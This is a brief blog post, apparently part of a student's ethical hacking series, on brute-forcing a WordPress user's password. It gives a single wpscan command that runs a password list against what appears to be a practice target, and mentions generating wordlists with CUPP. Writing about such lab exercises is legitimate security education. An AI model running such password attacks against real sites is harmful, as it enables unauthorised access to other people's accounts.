Ethical Hacking: #13 WordPress Password Attack

by asokawotulo on 27/06/2019

Using the information previously gathered from the user enumeration we are then able to attack a certain user with a password list that can either be generated using tools, like CUPP, or can be made manually.

wpscan --url team1.pentest.id -U @user1 -P Desktop/password.txt

asoka.watulo@binus.ac.id

Comments are closed.